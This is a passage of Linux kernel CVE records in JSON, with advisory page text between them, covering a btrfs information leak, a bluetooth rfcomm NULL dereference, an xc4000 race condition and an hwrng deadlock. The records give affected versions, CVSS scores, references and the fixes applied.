"versions": [
{
"lessThan": "689efe22e9b5b7d9d523119a9a5c3c17107a0772",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "73db209dcd4ae026021234d40cfcb2fb5b564b86",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "30189e54ba80e3209d34cfeea87b848f6ae025e6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e58047553a4e859dafc8d1d901e1de77c9dd922d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8bdbcfaf3eac42f98e5486b3d7e130fa287811f6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "3a63cee1a5e14a3e52c19142c61dd5fcb524f6dc",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "fddc19631c51d9c17d43e9f822a7bc403af88d54",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2f7ef5bb4a2f3e481ef05fab946edb97c84f67cf",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/btrfs/backref.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.158",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.30",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.158",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.90",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix information leak in btrfs_ioctl_logical_to_ino()\n\nSyzbot reported the following information leak for in\nbtrfs_ioctl_logical_to_ino():\n\n BUG: KMSAN: kernel-infoleak in instrument_copy_to_user include/linux/instrumented.h:114 [inline]\n BUG: KMSAN: kernel-infoleak in _copy_to_user+0xbc/0x110 lib/usercopy.c:40\n instrument_copy_to_user include/linux/instrumented.h:114 [inline]\n _copy_to_user+0xbc/0x110 lib/usercopy.c:40\n copy_to_user include/linux/uaccess.h:191 [inline]\n btrfs_ioctl_logical_to_ino+0x440/0x750 fs/btrfs/ioctl.c:3499\n btrfs_ioctl+0x714/0x1260\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:904 [inline]\n __se_sys_ioctl+0x261/0x450 fs/ioctl.c:890\n __x64_sys_ioctl+0x96/0xe0 fs/ioctl.c:890\n x64_sys_call+0x1883/0x3b50 arch/x86/include/generated/asm/syscalls_64.h:17\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\n Uninit was created at:\n __kmalloc_large_node+0x231/0x370 mm/slub.c:3921\n __do_kmalloc_node mm/slub.c:3954 [inline]\n __kmalloc_node+0xb07/0x1060 mm/slub.c:3973\n kmalloc_node include/linux/slab.h:648 [inline]\n kvmalloc_node+0xc0/0x2d0 mm/util.c:634\n kvmalloc include/linux/slab.h:766 [inline]\n init_data_container+0x49/0x1e0 fs/btrfs/backref.c:2779\n btrfs_ioctl_logical_to_ino+0x17c/0x750 fs/btrfs/ioctl.c:3480\n btrfs_ioctl+0x714/0x1260\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:904 [inline]\n __se_sys_ioctl+0x261/0x450 fs/ioctl.c:890\n __x64_sys_ioctl+0x96/0xe0 fs/ioctl.c:890\n x64_sys_call+0x1883/0x3b50 arch/x86/include/generated/asm/syscalls_64.h:17\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\n Bytes 40-65535 of 65536 are uninitialized\n Memory access of size 65536 starts at ffff888045a40000\n\nThis happens, because we\u0027re copying a \u0027struct btrfs_data_container\u0027 back\nto user-space. This btrfs_data_container is allocated in\n\u0027init_data_container()\u0027 via kvmalloc(), which does not zero-fill the\nmemory.\n\nFix this by using kvzalloc() which zeroes out the memory on allocation."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:06:47.671Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/689efe22e9b5b7d9d523119a9a5c3c17107a0772"
},
{
"url": "https://git.kernel.org/stable/c/73db209dcd4ae026021234d40cfcb2fb5b564b86"
},
{
"url": "https://git.kernel.org/stable/c/30189e54ba80e3209d34cfeea87b848f6ae025e6"
},
{
"url": "https://git.kernel.org/stable/c/e58047553a4e859dafc8d1d901e1de77c9dd922d"
},
{
"url": "https://git.kernel.org/stable/c/8bdbcfaf3eac42f98e5486b3d7e130fa287811f6"
},
{
"url": "https://git.kernel.org/stable/c/3a63cee1a5e14a3e52c19142c61dd5fcb524f6dc"
},
{
"url": "https://git.kernel.org/stable/c/fddc19631c51d9c17d43e9f822a7bc403af88d54"
},
{
"url": "https://git.kernel.org/stable/c/2f7ef5bb4a2f3e481ef05fab946edb97c84f67cf"
}
],
"title": "btrfs: fix information leak in btrfs_ioctl_logical_to_ino()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35849",
"datePublished": "2024-05-17T14:47:27.486Z",
"dateReserved": "2024-05-17T13:50:33.105Z",
"dateUpdated": "2025-05-04T09:06:47.671Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-22099 (GCVE-0-2024-22099)
Vulnerability from cvelistv5
Published
2024-01-25 07:02
Modified
2025-06-05 19:44
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-476 - NULL Pointer Dereference
Summary
NULL Pointer Dereference vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (net, bluetooth modules) allows Overflow Buffers. This vulnerability is associated with program files /net/bluetooth/rfcomm/core.C.
This issue affects Linux kernel: v2.6.12-rc2.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux kernel |
Version: v2.6.12-rc2 < v6.8-rc1 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-01T22:35:34.715Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=7956"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IVVYSTEVMPYGF6GDSOD44MUXZXAZHOHB/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSXNF4RLEFLH35BFUQGYXRRVHHUIVBAE/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-22099",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-01-29T19:53:29.673847Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-06-05T19:44:19.805Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://mirrors.openanolis.cn/anolis/",
"defaultStatus": "unaffected",
"modules": [
"net",
"bluetooth"
],
"packageName": "kernel",
"platforms": [
"Linux",
"x86",
"ARM"
],
"product": "Linux kernel",
"programFiles": [
"https://gitee.com/anolis/cloud-kernel/blob/release-5.10/net/bluetooth/rfcomm/core.c"
],
"repo": "https://gitee.com/anolis/cloud-kernel.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "v6.8-rc1",
"status": "affected",
"version": "v2.6.12-rc2",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "Yuxuan-Hu \u003c20373622@buaa.edu.cn\u003e"
}
],
"datePublic": "2024-01-19T03:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "NULL Pointer Dereference vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (net, bluetooth modules) allows Overflow Buffers.\u003cp\u003e This vulnerability is associated with program files \u003ctt\u003e/net/bluetooth/rfcomm/core.C\u003c/tt\u003e.\u003c/p\u003e\u003cp\u003eThis issue affects Linux kernel: v2.6.12-rc2.\u003c/p\u003e"
}
],
"value": "NULL Pointer Dereference vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (net, bluetooth modules) allows Overflow Buffers. This vulnerability is associated with program files /net/bluetooth/rfcomm/core.C.\n\nThis issue affects Linux kernel: v2.6.12-rc2."
}
],
"impacts": [
{
"capecId": "CAPEC-100",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-100 Overflow Buffers"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-27T12:08:47.749Z",
"orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"shortName": "Anolis"
},
"references": [
{
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=7956"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IVVYSTEVMPYGF6GDSOD44MUXZXAZHOHB/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSXNF4RLEFLH35BFUQGYXRRVHHUIVBAE/"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=6ec00b0737fe\"\u003ehttps://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=6ec00b0737fe\u003c/a\u003e\u003cbr\u003e"
}
],
"value": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=6ec00b0737fe https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/"
}
],
"source": {
"advisory": "Not yet",
"discovery": "INTERNAL"
},
"title": "NULL pointer deference in rfcomm_check_security in Linux kernel",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"assignerShortName": "Anolis",
"cveId": "CVE-2024-22099",
"datePublished": "2024-01-25T07:02:59.928Z",
"dateReserved": "2024-01-15T09:44:45.533Z",
"dateUpdated": "2025-06-05T19:44:19.805Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-24861 (GCVE-0-2024-24861)
Vulnerability from cvelistv5
Published
2024-02-05 07:26
Modified
2025-02-13 17:40
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-362 - Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
Summary
A race condition was found in the Linux kernel's media/xc4000 device driver in xc4000 xc4000_get_frequency() function. This can result in return value overflow issue, possibly leading to malfunction or denial of service issue.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux kernel |
Version: v3.1-rc1 < v6.8-rc1 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-24861",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-22T18:11:41.377364Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:43:39.200Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T23:28:12.999Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8150"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://kernel.org/",
"defaultStatus": "unaffected",
"modules": [
"media",
"xc4000"
],
"packageName": "kernel",
"platforms": [
"Linux",
"x86",
"ARM"
],
"product": "Linux kernel",
"programFiles": [
"https://gitee.com/anolis/cloud-kernel/blob/devel-5.10/drivers/media/tuners/xc4000.c"
],
"repo": "https://gitee.com/anolis/cloud-kernel.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "v6.8-rc1",
"status": "affected",
"version": "v3.1-rc1",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "\u767d\u5bb6\u9a79 \u003cbaijiaju@buaa.edu.cn\u003e"
},
{
"lang": "en",
"type": "reporter",
"user": "00000000-0000-4000-9000-000000000000",
"value": "\u97e9\u6842\u680b \u003changuidong@buaa.edu.cn\u003e"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eA race condition was found in the Linux kernel\u0027s media/xc4000 device driver in xc4000 xc4000_get_frequency() function. This can result in return value overflow issue, possibly leading to malfunction or denial of service issue.\u003c/p\u003e"
}
],
"value": "A race condition was found in the Linux kernel\u0027s media/xc4000 device driver in xc4000 xc4000_get_frequency() function. This can result in return value overflow issue, possibly leading to malfunction or denial of service issue."
}
],
"impacts": [
{
"capecId": "CAPEC-26",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-26 Leveraging Race Conditions"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 3.3,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-362",
"description": "CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-27T12:12:24.933Z",
"orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"shortName": "Anolis"
},
"references": [
{
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8150"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://lore.kernel.org/lkml/20231222055030.5237-1-2045gemini@gmail.com/\"\u003ehttps://lore.kernel.org/lkml/20231222055030.5237-1-2045gemini@gmail.com/\u003c/a\u003e\u003cbr\u003e"
}
],
"value": "https://lore.kernel.org/lkml/20231222055030.5237-1-2045gemini@gmail.com/ https://lore.kernel.org/lkml/20231222055030.5237-1-2045gemini@gmail.com/"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Race condition vulnerability in Linux kernel media/xc4000 xc4000_get_frequency()",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"assignerShortName": "Anolis",
"cveId": "CVE-2024-24861",
"datePublished": "2024-02-05T07:26:43.824Z",
"dateReserved": "2024-02-01T09:11:56.214Z",
"dateUpdated": "2025-02-13T17:40:35.162Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52615 (GCVE-0-2023-52615)
Vulnerability from cvelistv5
Published
2024-03-18 10:14
Modified
2025-05-04 07:39
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
hwrng: core - Fix page fault dead lock on mmap-ed hwrng
There is a dead-lock in the hwrng device read path. This triggers
when the user reads from /dev/hwrng into memory also mmap-ed from
/dev/hwrng. The resulting page fault triggers a recursive read
which then dead-locks.
Fix this by using a stack buffer when calling copy_to_user.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9996508b3353063f2d6c48c1a28a84543d72d70b Version: 9996508b3353063f2d6c48c1a28a84543d72d70b Version: 9996508b3353063f2d6c48c1a28a84543d72d70b Version: 9996508b3353063f2d6c48c1a28a84543d72d70b Version: 9996508b3353063f2d6c48c1a28a84543d72d70b Version: 9996508b3353063f2d6c48c1a28a84543d72d70b Version: 9996508b3353063f2d6c48c1a28a84543d72d70b Version: 9996508b3353063f2d6c48c1a28a84543d72d70b |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.329Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eafd83b92f6c044007a3591cbd476bcf90455990"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5030d4c798863ccb266563201b341a099e8cdd48"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c6a8111aacbfe7a8a70f46cc0de8eed00561693c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/26cc6d7006f922df6cc4389248032d955750b2a0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/aa8aa16ed9adf1df05bb339d588cf485a011839e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ecabe8cd456d3bf81e92c53b074732f3140f170d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6822a14271786150e178869f1495cc03e74c5029"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/78aafb3884f6bc6636efcc1760c891c8500b9922"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52615",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:55:19.515526Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:21.562Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/char/hw_random/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "eafd83b92f6c044007a3591cbd476bcf90455990",
"status": "affected",
"version": "9996508b3353063f2d6c48c1a28a84543d72d70b",
"versionType": "git"
},
{
"lessThan": "5030d4c798863ccb266563201b341a099e8cdd48",
"status": "affected",
"version": "9996508b3353063f2d6c48c1a28a84543d72d70b",
"versionType": "git"
},
{
"lessThan": "c6a8111aacbfe7a8a70f46cc0de8eed00561693c",
"status": "affected",
"version": "9996508b3353063f2d6c48c1a28a84543d72d70b",
"versionType": "git"
},
{
"lessThan": "26cc6d7006f922df6cc4389248032d955750b2a0",
"status": "affected",
"version": "9996508b3353063f2d6c48c1a28a84543d72d70b",
"versionType": "git"
},
{
"lessThan": "aa8aa16ed9adf1df05bb339d588cf485a011839e",
"status": "affected",
"version": "9996508b3353063f2d6c48c1a28a84543d72d70b",
"versionType": "git"
},
{
"lessThan": "ecabe8cd456d3bf81e92c53b074732f3140f170d",
"status": "affected",
"version": "9996508b3353063f2d6c48c1a28a84543d72d70b",
"versionType": "git"
},
{
"lessThan": "6822a14271786150e178869f1495cc03e74c5029",
"status": "affected",
"version": "9996508b3353063f2d6c48c1a28a84543d72d70b",
"versionType": "git"
},
{
"lessThan": "78aafb3884f6bc6636efcc1760c891c8500b9922",
"status": "affected",
"version": "9996508b3353063f2d6c48c1a28a84543d72d70b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/char/hw_random/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.33"
},
{
"lessThan": "2.6.33",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "2.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "2.6.33",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwrng: core - Fix page fault dead lock on mmap-ed hwrng\n\nThere is a dead-lock in the hwrng device read path. This triggers\nwhen the user reads from /dev/hwrng into memory also mmap-ed from\n/dev/hwrng. The resulting page fault triggers a recursive read\nwhich then dead-locks.\n\nFix this by using a stack buffer when calling copy_to_user."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:39:56.098Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/eafd83b92f6c044007a3591cbd476bcf90455990"
},
{
"url": "https://git.kernel.org/stable/c/5030d4c798863ccb266563201b341a099e8cdd48"
},
{
"url": "https://git.kernel.org/stable/c/c6a8111aacbfe7a8a70f46cc0de8eed00561693c"
},
{
"url": "https://git.kernel.org/stable/c/26cc6d7006f922df6cc4389248032d955750b2a0"
},
{
"url": "https://git.kernel.org/stable/c/aa8aa16ed9adf1df05bb339d588cf485a011839e"
},
{
"url": "https://git.kernel.org/stable/c/ecabe8cd456d3bf81e92c53b074732f3140f170d"
},
{
"url": "https://git.kernel.org/stable/c/6822a14271786150e178869f1495cc03e74c5029"
},
{
"url": "https://git.kernel.org/stable/c/78aafb3884f6bc6636efcc1760c891c8500b9922"
}
],
"title": "hwrng: core - Fix page fault dead lock on mmap-ed hwrng",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52615",
